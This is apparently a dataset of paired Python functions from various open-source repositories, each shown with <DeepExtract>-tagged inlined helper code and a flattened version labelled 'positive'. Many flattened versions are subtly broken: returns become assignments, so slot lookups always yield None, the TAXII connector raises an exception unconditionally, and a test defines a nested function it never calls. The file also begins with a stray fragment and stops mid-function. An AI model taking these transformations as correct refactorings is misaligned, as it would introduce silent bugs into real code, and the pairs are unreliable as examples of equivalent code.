target = hero.findNearestEnemy()
if target:
hero.command(friend, 'attack', target)
|
CodeCombat
|
positive
|
def freeze_support():
"""
Run code for process object if this in not the main process
"""
if is_forking(sys.argv):
kwds = {}
for arg in sys.argv[2:]:
(name, value) = arg.split('=')
if value == 'None':
kwds[name] = None
else:
kwds[name] = int(value)
<DeepExtract>
assert is_forking(sys.argv)
if sys.platform == 'win32':
import msvcrt
from .reduction import steal_handle
new_handle = steal_handle(parent_pid, pipe_handle)
fd = msvcrt.open_osfhandle(new_handle, os.O_RDONLY)
else:
from . import semaphore_tracker
semaphore_tracker._semaphore_tracker._fd = tracker_fd
fd = pipe_handle
exitcode = _main(fd)
sys.exit(exitcode)
</DeepExtract>
sys.exit()
|
def freeze_support():
"""
Run code for process object if this in not the main process
"""
if is_forking(sys.argv):
kwds = {}
for arg in sys.argv[2:]:
(name, value) = arg.split('=')
if value == 'None':
kwds[name] = None
else:
kwds[name] = int(value)
assert is_forking(sys.argv)
if sys.platform == 'win32':
import msvcrt
from .reduction import steal_handle
new_handle = steal_handle(parent_pid, pipe_handle)
fd = msvcrt.open_osfhandle(new_handle, os.O_RDONLY)
else:
from . import semaphore_tracker
semaphore_tracker._semaphore_tracker._fd = tracker_fd
fd = pipe_handle
exitcode = _main(fd)
sys.exit(exitcode)
sys.exit()
|
billiard
|
positive
|
def create(self, label, pin, sopin):
<DeepExtract>
slots = self.pkcs11.getSlotList(tokenPresent=True)
for slot in slots:
info = self.pkcs11.getTokenInfo(slot)
try:
if info.label.split('\x00')[0].strip() == label:
slot = slot
except AttributeError:
continue
slot = None
</DeepExtract>
if slot is not None:
return
slot = self.pkcs11.getSlotList(tokenPresent=True)[-1]
self.pkcs11.initToken(slot, sopin, label)
session = self.pkcs11.openSession(slot, PyKCS11.CKF_SERIAL_SESSION | PyKCS11.CKF_RW_SESSION)
session.login(sopin, user_type=PyKCS11.CKU_SO)
session.initPin(pin)
session.logout()
session.closeSession()
|
def create(self, label, pin, sopin):
slots = self.pkcs11.getSlotList(tokenPresent=True)
for slot in slots:
info = self.pkcs11.getTokenInfo(slot)
try:
if info.label.split('\x00')[0].strip() == label:
slot = slot
except AttributeError:
continue
slot = None
if slot is not None:
return
slot = self.pkcs11.getSlotList(tokenPresent=True)[-1]
self.pkcs11.initToken(slot, sopin, label)
session = self.pkcs11.openSession(slot, PyKCS11.CKF_SERIAL_SESSION | PyKCS11.CKF_RW_SESSION)
session.login(sopin, user_type=PyKCS11.CKU_SO)
session.initPin(pin)
session.logout()
session.closeSession()
|
endesive
|
positive
|
def action_import(self, *args):
"""Handle the result of an 'open' file chooser dialog. It will then try
to import it as the selection."""
file_chooser = Gtk.FileChooserNative.new(_('Import a picture'), self, Gtk.FileChooserAction.OPEN, _('Import'), _('Cancel'))
utilities_add_filechooser_filters(file_chooser)
response = file_chooser.run()
if response == Gtk.ResponseType.ACCEPT:
<DeepExtract>
self.force_selection()
pixbuf = GdkPixbuf.Pixbuf.new_from_file(file_chooser.get_filename())
self.get_selection_tool().import_selection(pixbuf)
</DeepExtract>
file_chooser.destroy()
|
def action_import(self, *args):
"""Handle the result of an 'open' file chooser dialog. It will then try
to import it as the selection."""
file_chooser = Gtk.FileChooserNative.new(_('Import a picture'), self, Gtk.FileChooserAction.OPEN, _('Import'), _('Cancel'))
utilities_add_filechooser_filters(file_chooser)
response = file_chooser.run()
if response == Gtk.ResponseType.ACCEPT:
self.force_selection()
pixbuf = GdkPixbuf.Pixbuf.new_from_file(file_chooser.get_filename())
self.get_selection_tool().import_selection(pixbuf)
file_chooser.destroy()
|
drawing
|
positive
|
def PlotMarriageData(resp):
"""Plots hazard and survival functions.
resp: DataFrame of respondents
"""
<DeepExtract>
complete = resp[resp.evrmarry == 1].agemarry
ongoing = resp[resp.evrmarry == 0].age
hf = EstimateHazardFunction(complete, ongoing)
sf = hf.MakeSurvival()
(hf, sf) = (hf, sf)
</DeepExtract>
thinkplot.PrePlot(rows=2)
thinkplot.Plot(hf)
thinkplot.Config(legend=False)
thinkplot.SubPlot(2)
thinkplot.Plot(sf)
thinkplot.Save(root='survival2', xlabel='age (years)', ylabel='prob unmarried', ylim=[0, 1], legend=False, formats=FORMATS)
return sf
|
def PlotMarriageData(resp):
"""Plots hazard and survival functions.
resp: DataFrame of respondents
"""
complete = resp[resp.evrmarry == 1].agemarry
ongoing = resp[resp.evrmarry == 0].age
hf = EstimateHazardFunction(complete, ongoing)
sf = hf.MakeSurvival()
(hf, sf) = (hf, sf)
thinkplot.PrePlot(rows=2)
thinkplot.Plot(hf)
thinkplot.Config(legend=False)
thinkplot.SubPlot(2)
thinkplot.Plot(sf)
thinkplot.Save(root='survival2', xlabel='age (years)', ylabel='prob unmarried', ylim=[0, 1], legend=False, formats=FORMATS)
return sf
|
bayesianGameofThrones
|
positive
|
def step(self, action: Union[None, Dict[str, ActionType]]) -> bool:
"""
Run a single step of following the behavioral scheme set for this environment.
:param action: the action to apply to the agents held in this level, before beginning following
the scheme.
:return: None
"""
if action is not None:
for (agent_name, agent) in self.agents.items():
agent.set_incoming_directive(action)
if self.reset_required:
<DeepExtract>
[agent.reset_internal_state() for agent in self.agents.values()]
self.reset_required = False
if self.real_environment and self.real_environment.current_episode_steps_counter == 0:
self.last_env_response = self.real_environment.last_env_response
return self.last_env_response
</DeepExtract>
env_responses = copy.copy(self.environment.last_env_response)
if isinstance(env_responses, EnvResponse):
env_responses = [env_responses]
accumulated_rewards = [0] * len(self.agents)
for i in range(self.steps_limit.num_steps):
done = self.done_condition([agent.observe(env_response) for (agent, env_response) in zip(self.agents.values(), env_responses)])
if done:
break
else:
action_infos = [agent.act() for agent in self.agents.values()]
if any(action_infos):
env_responses = self.environment.step([action_info.action if action_info else None for action_info in action_infos])
if isinstance(env_responses, EnvResponse):
env_responses = [env_responses]
accumulated_rewards = [accumulated_reward + env_response.reward if env_response else accumulated_reward for (accumulated_reward, env_response) in zip(accumulated_rewards, env_responses)]
env_responses_for_upper_level = copy.copy(env_responses)
for (env_response_for_upper_level, accumulated_reward) in zip(env_responses_for_upper_level, accumulated_rewards):
env_response_for_upper_level.reward = accumulated_reward
self.last_env_response = env_responses_for_upper_level
done = self.done_condition((env_response.game_over for env_response in env_responses))
if done or self.should_reset_agent_state_after_time_limit_passes:
[agent.observe(env_response) for (agent, env_response) in zip(self.agents.values(), env_responses)]
<DeepExtract>
[agent.handle_episode_ended() for agent in self.agents.values()]
</DeepExtract>
self.reset_required = True
return done
|
def step(self, action: Union[None, Dict[str, ActionType]]) -> bool:
"""
Run a single step of following the behavioral scheme set for this environment.
:param action: the action to apply to the agents held in this level, before beginning following
the scheme.
:return: None
"""
if action is not None:
for (agent_name, agent) in self.agents.items():
agent.set_incoming_directive(action)
if self.reset_required:
[agent.reset_internal_state() for agent in self.agents.values()]
self.reset_required = False
if self.real_environment and self.real_environment.current_episode_steps_counter == 0:
self.last_env_response = self.real_environment.last_env_response
return self.last_env_response
env_responses = copy.copy(self.environment.last_env_response)
if isinstance(env_responses, EnvResponse):
env_responses = [env_responses]
accumulated_rewards = [0] * len(self.agents)
for i in range(self.steps_limit.num_steps):
done = self.done_condition([agent.observe(env_response) for (agent, env_response) in zip(self.agents.values(), env_responses)])
if done:
break
else:
action_infos = [agent.act() for agent in self.agents.values()]
if any(action_infos):
env_responses = self.environment.step([action_info.action if action_info else None for action_info in action_infos])
if isinstance(env_responses, EnvResponse):
env_responses = [env_responses]
accumulated_rewards = [accumulated_reward + env_response.reward if env_response else accumulated_reward for (accumulated_reward, env_response) in zip(accumulated_rewards, env_responses)]
env_responses_for_upper_level = copy.copy(env_responses)
for (env_response_for_upper_level, accumulated_reward) in zip(env_responses_for_upper_level, accumulated_rewards):
env_response_for_upper_level.reward = accumulated_reward
self.last_env_response = env_responses_for_upper_level
done = self.done_condition((env_response.game_over for env_response in env_responses))
if done or self.should_reset_agent_state_after_time_limit_passes:
[agent.observe(env_response) for (agent, env_response) in zip(self.agents.values(), env_responses)]
[agent.handle_episode_ended() for agent in self.agents.values()]
self.reset_required = True
return done
|
deepracer-local
|
positive
|
def run(self):
"""Run connector on a schedule"""
while True:
self.server.refresh()
timestamp = int(time.time())
if self.first_run:
self.helper.log_info('Connector has never run')
else:
last_run = datetime.utcfromtimestamp(self.helper.get_state()['last_run']).strftime('%Y-%m-%d %H:%M:%S')
self.helper.log_info('Connector last run: ' + last_run)
for collection in self.collections:
try:
(root_path, coll_title) = collection.split('.')
if root_path == '*':
<DeepExtract>
self.helper.log_info('Polling all API Roots')
for root in self.server.api_roots:
if coll_title == '*':
self.poll_entire_root(root)
else:
try:
coll = self._get_collection(root, coll_title)
except TAXIIServiceException:
self.helper.log_error(f'Error searching for collection {coll_title} in API Root {root.title}')
return
try:
self.poll(coll)
except TAXIIServiceException as err:
msg = f'Error trying to poll Collection {coll_title} in API Root {root.title}. Skipping'
self.helper.log_error(msg)
self.helper.log_error(err)
</DeepExtract>
elif coll_title == '*':
<DeepExtract>
for root in self.server.api_roots:
if root.url.split('/')[-2] == root_path:
root = root
msg = f'Api Root {root_path} does not exist in the TAXII server'
raise TAXIIServiceException(msg)
</DeepExtract>
<DeepExtract>
self.helper.log_info(f'Polling entire API root {root.title}')
for coll in root.collections:
try:
self.poll(coll)
except TAXIIServiceException as err:
msg = f'Error trying to poll Collection {coll.title} in API Root {root.title}. Skipping'
self.helper.log_error(msg)
self.helper.log_error(err)
</DeepExtract>
else:
<DeepExtract>
for root in self.server.api_roots:
if root.url.split('/')[-2] == root_path:
root = root
msg = f'Api Root {root_path} does not exist in the TAXII server'
raise TAXIIServiceException(msg)
</DeepExtract>
<DeepExtract>
for coll in root.collections:
if coll.title == coll_title:
coll = coll
msg = f'Collection {coll_title} does not exist in API root {root.title}'
raise TAXIIServiceException(msg)
</DeepExtract>
<DeepExtract>
filters = {}
if self.first_run:
lookback = self.initial_history or None
else:
lookback = self.interval
if lookback:
added_after = datetime.now() - timedelta(hours=lookback)
filters['added_after'] = added_after
self.helper.log_info(f'Polling Collection {coll.title}')
self.send_to_server(coll.get_objects(**filters))
</DeepExtract>
except (TAXIIServiceException, HTTPError) as err:
self.helper.log_error('Error connecting to TAXII server')
self.helper.log_error(err)
continue
self.helper.log_info(f'Run Complete. Sleeping until next run in {self.interval} hours')
self.helper.set_state({'last_run': timestamp})
if self.helper.connect_run_and_terminate:
self.helper.log_info('Connector stop')
sys.exit(0)
time.sleep(self.get_interval())
|
def run(self):
"""Run connector on a schedule"""
while True:
self.server.refresh()
timestamp = int(time.time())
if self.first_run:
self.helper.log_info('Connector has never run')
else:
last_run = datetime.utcfromtimestamp(self.helper.get_state()['last_run']).strftime('%Y-%m-%d %H:%M:%S')
self.helper.log_info('Connector last run: ' + last_run)
for collection in self.collections:
try:
(root_path, coll_title) = collection.split('.')
if root_path == '*':
self.helper.log_info('Polling all API Roots')
for root in self.server.api_roots:
if coll_title == '*':
self.poll_entire_root(root)
else:
try:
coll = self._get_collection(root, coll_title)
except TAXIIServiceException:
self.helper.log_error(f'Error searching for collection {coll_title} in API Root {root.title}')
return
try:
self.poll(coll)
except TAXIIServiceException as err:
msg = f'Error trying to poll Collection {coll_title} in API Root {root.title}. Skipping'
self.helper.log_error(msg)
self.helper.log_error(err)
elif coll_title == '*':
for root in self.server.api_roots:
if root.url.split('/')[-2] == root_path:
root = root
msg = f'Api Root {root_path} does not exist in the TAXII server'
raise TAXIIServiceException(msg)
self.helper.log_info(f'Polling entire API root {root.title}')
for coll in root.collections:
try:
self.poll(coll)
except TAXIIServiceException as err:
msg = f'Error trying to poll Collection {coll.title} in API Root {root.title}. Skipping'
self.helper.log_error(msg)
self.helper.log_error(err)
else:
for root in self.server.api_roots:
if root.url.split('/')[-2] == root_path:
root = root
msg = f'Api Root {root_path} does not exist in the TAXII server'
raise TAXIIServiceException(msg)
for coll in root.collections:
if coll.title == coll_title:
coll = coll
msg = f'Collection {coll_title} does not exist in API root {root.title}'
raise TAXIIServiceException(msg)
filters = {}
if self.first_run:
lookback = self.initial_history or None
else:
lookback = self.interval
if lookback:
added_after = datetime.now() - timedelta(hours=lookback)
filters['added_after'] = added_after
self.helper.log_info(f'Polling Collection {coll.title}')
self.send_to_server(coll.get_objects(**filters))
except (TAXIIServiceException, HTTPError) as err:
self.helper.log_error('Error connecting to TAXII server')
self.helper.log_error(err)
continue
self.helper.log_info(f'Run Complete. Sleeping until next run in {self.interval} hours')
self.helper.set_state({'last_run': timestamp})
if self.helper.connect_run_and_terminate:
self.helper.log_info('Connector stop')
sys.exit(0)
time.sleep(self.get_interval())
|
connectors
|
positive
|
def extract_result(self):
"""Extract the result from the current state.
Returns
-------
result : Sample
"""
if self.state['samples'] is None:
raise ValueError('Nothing to extract')
if self.adaptive:
<DeepExtract>
self.model[self.discrepancy_name].update_distance()
nums = self.objective['n_samples']
data = {s: self.state['samples'][s][:nums] for s in self.sums}
ds = self.model[self.discrepancy_name].generate(with_values=data)
sort_distance = np.atleast_2d(np.transpose(ds))[-1]
sort_mask = np.argsort(sort_distance)
self.state['samples'][self.discrepancy_name] = sort_distance
for k in self.state['samples'].keys():
if k != self.discrepancy_name:
self.state['samples'][k][:nums] = self.state['samples'][k][sort_mask]
self._update_state_meta()
</DeepExtract>
outputs = dict()
for (k, v) in self.state['samples'].items():
outputs[k] = v[:self.objective['n_samples']]
return Sample(outputs=outputs, **self._extract_result_kwargs())
|
def extract_result(self):
"""Extract the result from the current state.
Returns
-------
result : Sample
"""
if self.state['samples'] is None:
raise ValueError('Nothing to extract')
if self.adaptive:
self.model[self.discrepancy_name].update_distance()
nums = self.objective['n_samples']
data = {s: self.state['samples'][s][:nums] for s in self.sums}
ds = self.model[self.discrepancy_name].generate(with_values=data)
sort_distance = np.atleast_2d(np.transpose(ds))[-1]
sort_mask = np.argsort(sort_distance)
self.state['samples'][self.discrepancy_name] = sort_distance
for k in self.state['samples'].keys():
if k != self.discrepancy_name:
self.state['samples'][k][:nums] = self.state['samples'][k][sort_mask]
self._update_state_meta()
outputs = dict()
for (k, v) in self.state['samples'].items():
outputs[k] = v[:self.objective['n_samples']]
return Sample(outputs=outputs, **self._extract_result_kwargs())
|
elfi
|
positive
|
def load(self, f=None):
if self.has_checkpoint():
<DeepExtract>
save_file = os.path.join(self.save_dir, 'last_checkpoint')
try:
with open(save_file, 'r') as f:
last_saved = f.read()
last_saved = last_saved.strip()
except IOError:
last_saved = ''
f = last_saved
</DeepExtract>
if not f:
self.logger.info('No checkpoint found. Initializing model from scratch')
return {}
self.logger.info('Loading checkpoint from {}'.format(f))
<DeepExtract>
checkpoint = torch.load(f, map_location=torch.device('cpu'))
</DeepExtract>
<DeepExtract>
load_state_dict(self.model, checkpoint.pop('model'))
</DeepExtract>
if 'optimizer' in checkpoint and self.optimizer:
self.logger.info('Loading optimizer from {}'.format(f))
self.optimizer.load_state_dict(checkpoint.pop('optimizer'))
if 'scheduler' in checkpoint and self.scheduler:
self.logger.info('Loading scheduler from {}'.format(f))
self.scheduler.load_state_dict(checkpoint.pop('scheduler'))
return checkpoint
|
def load(self, f=None):
if self.has_checkpoint():
save_file = os.path.join(self.save_dir, 'last_checkpoint')
try:
with open(save_file, 'r') as f:
last_saved = f.read()
last_saved = last_saved.strip()
except IOError:
last_saved = ''
f = last_saved
if not f:
self.logger.info('No checkpoint found. Initializing model from scratch')
return {}
self.logger.info('Loading checkpoint from {}'.format(f))
checkpoint = torch.load(f, map_location=torch.device('cpu'))
load_state_dict(self.model, checkpoint.pop('model'))
if 'optimizer' in checkpoint and self.optimizer:
self.logger.info('Loading optimizer from {}'.format(f))
self.optimizer.load_state_dict(checkpoint.pop('optimizer'))
if 'scheduler' in checkpoint and self.scheduler:
self.logger.info('Loading scheduler from {}'.format(f))
self.scheduler.load_state_dict(checkpoint.pop('scheduler'))
return checkpoint
|
Box_Discretization_Network
|
positive
|
def __exit__(self, *args):
"""Support with-statement for the environment. """
<DeepExtract>
pass
</DeepExtract>
return False
|
def __exit__(self, *args):
"""Support with-statement for the environment. """
pass
return False
|
DQN-DDPG_Stock_Trading
|
positive
|
def find_path(self, target_location):
"""Returns the direction to move in, to (hopefully) reach the target
location (or None if the robot is completely stuck).
This is a very basic pathfinding algorithm, it looks for which empty
(non-solid) adjacent block is closest to the target location and
returns the direction for that block."""
<DeepExtract>
my_loc = self._locate(robotapi_pb2.RobotReadRequest.SELF)
</DeepExtract>
<DeepExtract>
request = robotapi_pb2.RobotRequest()
request.name = self.owner_name
self._counter += 1
request.key = self._counter
request = request
</DeepExtract>
request.read_request.locate_nonsolid_nearby = True
loc_proto_list = self._action(request).location_response.locations
loc_list = [Location.from_proto(l.absolute_location) for l in loc_proto_list]
best = None
targetdist = target_location.distance(loc_list[0]) + 20
for loc in loc_list:
newdist = target_location.distance(loc)
if newdist < targetdist and my_loc.distance(loc) == 1:
best = loc
targetdist = newdist
return my_loc.direction(best)
|
def find_path(self, target_location):
"""Returns the direction to move in, to (hopefully) reach the target
location (or None if the robot is completely stuck).
This is a very basic pathfinding algorithm, it looks for which empty
(non-solid) adjacent block is closest to the target location and
returns the direction for that block."""
my_loc = self._locate(robotapi_pb2.RobotReadRequest.SELF)
request = robotapi_pb2.RobotRequest()
request.name = self.owner_name
self._counter += 1
request.key = self._counter
request = request
request.read_request.locate_nonsolid_nearby = True
loc_proto_list = self._action(request).location_response.locations
loc_list = [Location.from_proto(l.absolute_location) for l in loc_proto_list]
best = None
targetdist = target_location.distance(loc_list[0]) + 20
for loc in loc_list:
newdist = target_location.distance(loc)
if newdist < targetdist and my_loc.distance(loc) == 1:
best = loc
targetdist = newdist
return my_loc.direction(best)
|
botchallenge
|
positive
|
def testRandomCropToAspectRatio(self):
<DeepExtract>
images_r = tf.constant([[[128, 128, 128, 128], [0, 0, 128, 128], [0, 128, 128, 128], [192, 192, 128, 128]]], dtype=tf.uint8)
images_r = tf.expand_dims(images_r, 3)
images_g = tf.constant([[[0, 0, 128, 128], [0, 0, 128, 128], [0, 128, 192, 192], [192, 192, 128, 192]]], dtype=tf.uint8)
images_g = tf.expand_dims(images_g, 3)
images_b = tf.constant([[[128, 128, 192, 0], [0, 0, 128, 192], [0, 128, 128, 0], [192, 192, 192, 128]]], dtype=tf.uint8)
images_b = tf.expand_dims(images_b, 3)
images = tf.concat([images_r, images_g, images_b], 3)
images = images
</DeepExtract>
<DeepExtract>
boxes = tf.constant([[0.0, 0.25, 0.75, 1.0], [0.25, 0.5, 0.75, 1.0]], dtype=tf.float32)
boxes = boxes
</DeepExtract>
<DeepExtract>
labels = tf.constant([1, 2], dtype=tf.int32)
labels = labels
</DeepExtract>
tensor_dict = {fields.InputDataFields.image: images, fields.InputDataFields.groundtruth_boxes: boxes, fields.InputDataFields.groundtruth_classes: labels}
tensor_dict = preprocessor.preprocess(tensor_dict, [])
images = tensor_dict[fields.InputDataFields.image]
preprocessing_options = [(preprocessor.random_crop_to_aspect_ratio, {'aspect_ratio': 2.0})]
cropped_tensor_dict = preprocessor.preprocess(tensor_dict, preprocessing_options)
cropped_images = cropped_tensor_dict[fields.InputDataFields.image]
cropped_boxes = cropped_tensor_dict[fields.InputDataFields.groundtruth_boxes]
boxes_shape = tf.shape(boxes)
cropped_boxes_shape = tf.shape(cropped_boxes)
images_shape = tf.shape(images)
cropped_images_shape = tf.shape(cropped_images)
with self.test_session() as sess:
(boxes_shape_, cropped_boxes_shape_, images_shape_, cropped_images_shape_) = sess.run([boxes_shape, cropped_boxes_shape, images_shape, cropped_images_shape])
self.assertAllEqual(boxes_shape_, cropped_boxes_shape_)
self.assertEqual(images_shape_[1], cropped_images_shape_[1] * 2)
self.assertEqual(images_shape_[2], cropped_images_shape_[2])
|
def testRandomCropToAspectRatio(self):
images_r = tf.constant([[[128, 128, 128, 128], [0, 0, 128, 128], [0, 128, 128, 128], [192, 192, 128, 128]]], dtype=tf.uint8)
images_r = tf.expand_dims(images_r, 3)
images_g = tf.constant([[[0, 0, 128, 128], [0, 0, 128, 128], [0, 128, 192, 192], [192, 192, 128, 192]]], dtype=tf.uint8)
images_g = tf.expand_dims(images_g, 3)
images_b = tf.constant([[[128, 128, 192, 0], [0, 0, 128, 192], [0, 128, 128, 0], [192, 192, 192, 128]]], dtype=tf.uint8)
images_b = tf.expand_dims(images_b, 3)
images = tf.concat([images_r, images_g, images_b], 3)
images = images
boxes = tf.constant([[0.0, 0.25, 0.75, 1.0], [0.25, 0.5, 0.75, 1.0]], dtype=tf.float32)
boxes = boxes
labels = tf.constant([1, 2], dtype=tf.int32)
labels = labels
tensor_dict = {fields.InputDataFields.image: images, fields.InputDataFields.groundtruth_boxes: boxes, fields.InputDataFields.groundtruth_classes: labels}
tensor_dict = preprocessor.preprocess(tensor_dict, [])
images = tensor_dict[fields.InputDataFields.image]
preprocessing_options = [(preprocessor.random_crop_to_aspect_ratio, {'aspect_ratio': 2.0})]
cropped_tensor_dict = preprocessor.preprocess(tensor_dict, preprocessing_options)
cropped_images = cropped_tensor_dict[fields.InputDataFields.image]
cropped_boxes = cropped_tensor_dict[fields.InputDataFields.groundtruth_boxes]
boxes_shape = tf.shape(boxes)
cropped_boxes_shape = tf.shape(cropped_boxes)
images_shape = tf.shape(images)
cropped_images_shape = tf.shape(cropped_images)
with self.test_session() as sess:
(boxes_shape_, cropped_boxes_shape_, images_shape_, cropped_images_shape_) = sess.run([boxes_shape, cropped_boxes_shape, images_shape, cropped_images_shape])
self.assertAllEqual(boxes_shape_, cropped_boxes_shape_)
self.assertEqual(images_shape_[1], cropped_images_shape_[1] * 2)
self.assertEqual(images_shape_[2], cropped_images_shape_[2])
|
Accident-Detection-on-Indian-Roads
|
positive
|
def test_deserialize_None(self):
<DeepExtract>
from colander import Invalid
exc = Invalid(node, msg, val)
typ = exc
</DeepExtract>
node = DummySchemaNode(None)
result = typ.deserialize(node, None)
self.assertEqual(result, colander.null)
|
def test_deserialize_None(self):
from colander import Invalid
exc = Invalid(node, msg, val)
typ = exc
node = DummySchemaNode(None)
result = typ.deserialize(node, None)
self.assertEqual(result, colander.null)
|
colander
|
positive
|
@pytest.mark.end2end
@pytest.mark.vcr
def test_upcoming_events_add_new_group__does_not_exist(self, login_client, factory, patch_slack):
config = factory.UpcomingEventsConfiguration(enabled=True)
slack_user = factory.SlackUser(installation=config.slack_installation)
<DeepExtract>
def _patch_slack(*, is_admin=None):
obj = FakeSlackClient(is_admin=True)
patcher(MODULE_TO_TEST, namespace='SlackClient', replacement=obj)
return obj
return _patch_slack
</DeepExtract>
client = login_client(user=slack_user)
rv = client.post('/settings/upcoming-events/group', data={'meetup_urlname': 'adsfasdfeum3n4x'}, follow_redirects=True)
assert rv.status_code == 200
assert b'Group does not exist' in rv.data
groups = UpcomingEventsGroup.query.all()
assert len(groups) == 0
|
@pytest.mark.end2end
@pytest.mark.vcr
def test_upcoming_events_add_new_group__does_not_exist(self, login_client, factory, patch_slack):
config = factory.UpcomingEventsConfiguration(enabled=True)
slack_user = factory.SlackUser(installation=config.slack_installation)
def _patch_slack(*, is_admin=None):
obj = FakeSlackClient(is_admin=True)
patcher(MODULE_TO_TEST, namespace='SlackClient', replacement=obj)
return obj
return _patch_slack
client = login_client(user=slack_user)
rv = client.post('/settings/upcoming-events/group', data={'meetup_urlname': 'adsfasdfeum3n4x'}, follow_redirects=True)
assert rv.status_code == 200
assert b'Group does not exist' in rv.data
groups = UpcomingEventsGroup.query.all()
assert len(groups) == 0
|
busy-beaver
|
positive
|
def load_data():
"""
Loads and preprocesses data for the MR dataset.
Returns input vectors, labels, vocabulary, and inverse vocabulary.
"""
<DeepExtract>
positive_examples = list(open('./data/rt-polarity.pos', encoding='ISO-8859-1').readlines())
positive_examples = [s.strip() for s in positive_examples]
negative_examples = list(open('./data/rt-polarity.neg', encoding='ISO-8859-1').readlines())
negative_examples = [s.strip() for s in negative_examples]
x_text = positive_examples + negative_examples
x_text = [clean_str(sent) for sent in x_text]
x_text = [s.split(' ') for s in x_text]
positive_labels = [[0, 1] for _ in positive_examples]
negative_labels = [[1, 0] for _ in negative_examples]
y = np.concatenate([positive_labels, negative_labels], 0)
(sentences, labels) = [x_text, y]
</DeepExtract>
<DeepExtract>
sequence_length = max((len(x) for x in sentences))
padded_sentences = []
for i in range(len(sentences)):
sentence = sentences[i]
num_padding = sequence_length - len(sentence)
new_sentence = sentence + [padding_word] * num_padding
padded_sentences.append(new_sentence)
sentences_padded = padded_sentences
</DeepExtract>
<DeepExtract>
word_counts = Counter(itertools.chain(*sentences_padded))
vocabulary_inv = [x[0] for x in word_counts.most_common()]
vocabulary = {x: i for (i, x) in enumerate(vocabulary_inv)}
(vocabulary, vocabulary_inv) = [vocabulary, vocabulary_inv]
</DeepExtract>
<DeepExtract>
x = np.array([[vocabulary[word] for word in sentence] for sentence in sentences_padded])
y = np.array(labels)
(x, y) = [x, y]
</DeepExtract>
return [x, y, vocabulary, vocabulary_inv]
|
def load_data():
"""
Loads and preprocesses data for the MR dataset.
Returns input vectors, labels, vocabulary, and inverse vocabulary.
"""
positive_examples = list(open('./data/rt-polarity.pos', encoding='ISO-8859-1').readlines())
positive_examples = [s.strip() for s in positive_examples]
negative_examples = list(open('./data/rt-polarity.neg', encoding='ISO-8859-1').readlines())
negative_examples = [s.strip() for s in negative_examples]
x_text = positive_examples + negative_examples
x_text = [clean_str(sent) for sent in x_text]
x_text = [s.split(' ') for s in x_text]
positive_labels = [[0, 1] for _ in positive_examples]
negative_labels = [[1, 0] for _ in negative_examples]
y = np.concatenate([positive_labels, negative_labels], 0)
(sentences, labels) = [x_text, y]
sequence_length = max((len(x) for x in sentences))
padded_sentences = []
for i in range(len(sentences)):
sentence = sentences[i]
num_padding = sequence_length - len(sentence)
new_sentence = sentence + [padding_word] * num_padding
padded_sentences.append(new_sentence)
sentences_padded = padded_sentences
word_counts = Counter(itertools.chain(*sentences_padded))
vocabulary_inv = [x[0] for x in word_counts.most_common()]
vocabulary = {x: i for (i, x) in enumerate(vocabulary_inv)}
(vocabulary, vocabulary_inv) = [vocabulary, vocabulary_inv]
x = np.array([[vocabulary[word] for word in sentence] for sentence in sentences_padded])
y = np.array(labels)
(x, y) = [x, y]
return [x, y, vocabulary, vocabulary_inv]
|
data-science-ipython-notebooks
|
positive
|
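A minimal, self-contained sketch of the padding-and-vocabulary steps inlined above, assuming plain tokenized sentences and a '<PAD/>' padding token (padding_word is otherwise undefined after inlining); illustrative only, not the repository's code:
from collections import Counter
import itertools
import numpy as np
sentences = [['the', 'movie', 'was', 'great'], ['terrible']]
padding_word = '<PAD/>'
# Pad every sentence to the length of the longest one.
sequence_length = max(len(s) for s in sentences)
padded = [s + [padding_word] * (sequence_length - len(s)) for s in sentences]
# Build the vocabulary from word frequencies, most common words first.
word_counts = Counter(itertools.chain(*padded))
vocabulary_inv = [w for w, _ in word_counts.most_common()]
vocabulary = {w: i for i, w in enumerate(vocabulary_inv)}
# Map words to integer ids.
x = np.array([[vocabulary[w] for w in s] for s in padded])
print(x.shape)  # (2, 4)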
def roc_auc(predictions: np.ndarray, labels: np.ndarray, average: str='macro') -> np.ndarray:
""" simple wrapper around sklearn.metrics.roc_auc_score
References
-------
.. [1] https://scikit-learn.org/stable/modules/generated/sklearn.metrics.roc_auc_score.html
.. [2] https://en.wikipedia.org/wiki/Receiver_operating_characteristic
"""
if predictions.ndim == 1:
raise ValueError('Predictions must be class probabilities before max!')
if labels.ndim == 1:
<DeepExtract>
onehot = np.zeros((labels.shape[0], predictions.shape[1]), dtype=np.uint16)
onehot[np.arange(onehot.shape[0]), labels] = 1
labels = onehot
</DeepExtract>
score = roc_auc_score(labels, predictions, average=average)
return score
|
def roc_auc(predictions: np.ndarray, labels: np.ndarray, average: str='macro') -> np.ndarray:
""" simple wrapper around sklearn.metrics.roc_auc_score
References
-------
.. [1] https://scikit-learn.org/stable/modules/generated/sklearn.metrics.roc_auc_score.html
.. [2] https://en.wikipedia.org/wiki/Receiver_operating_characteristic
"""
if predictions.ndim == 1:
raise ValueError('Predictions must be class probabilities before max!')
if labels.ndim == 1:
onehot = np.zeros((labels.shape[0], predictions.shape[1]), dtype=np.uint16)
onehot[np.arange(onehot.shape[0]), labels] = 1
labels = onehot
score = roc_auc_score(labels, predictions, average=average)
return score
|
deepethogram
|
positive
|
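A short usage sketch of the same one-hot-then-score pattern, assuming scikit-learn is installed; the hand-rolled one-hot step mirrors the inlined block above and is not deepethogram's API:
import numpy as np
from sklearn.metrics import roc_auc_score
# Class probabilities for 4 samples over 3 classes, plus integer labels.
predictions = np.array([[0.7, 0.2, 0.1],
                        [0.1, 0.8, 0.1],
                        [0.2, 0.2, 0.6],
                        [0.3, 0.4, 0.3]])
labels = np.array([0, 1, 2, 1])
# One-hot encode the integer labels, as in the snippet above.
onehot = np.zeros((labels.shape[0], predictions.shape[1]), dtype=np.uint16)
onehot[np.arange(onehot.shape[0]), labels] = 1
print(roc_auc_score(onehot, predictions, average='macro'))  # 1.0 for this toy input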
def s3_object_do_get(module, connection, connection_v4, s3_vars):
if module.params.get('sig_v4'):
connection = connection_v4
<DeepExtract>
try:
if s3_vars['version']:
connection.head_object(aws_retry=True, Bucket=s3_vars['bucket'], Key=s3_vars['object'], VersionId=s3_vars['version'])
else:
connection.head_object(aws_retry=True, Bucket=s3_vars['bucket'], Key=s3_vars['object'])
except is_boto3_error_code('404'):
keyrtn = False
except is_boto3_error_code('403') as e:
if s3_vars['validate'] is True:
module.fail_json_aws(e, msg='Failed while looking up object (during key check) %s.' % s3_vars['object'])
except (botocore.exceptions.BotoCoreError, botocore.exceptions.ClientError) as e:
raise S3ObjectFailure('Failed while looking up object (during key check) %s.' % s3_vars['object'], e)
keyrtn = True
</DeepExtract>
if not keyrtn:
if s3_vars['version']:
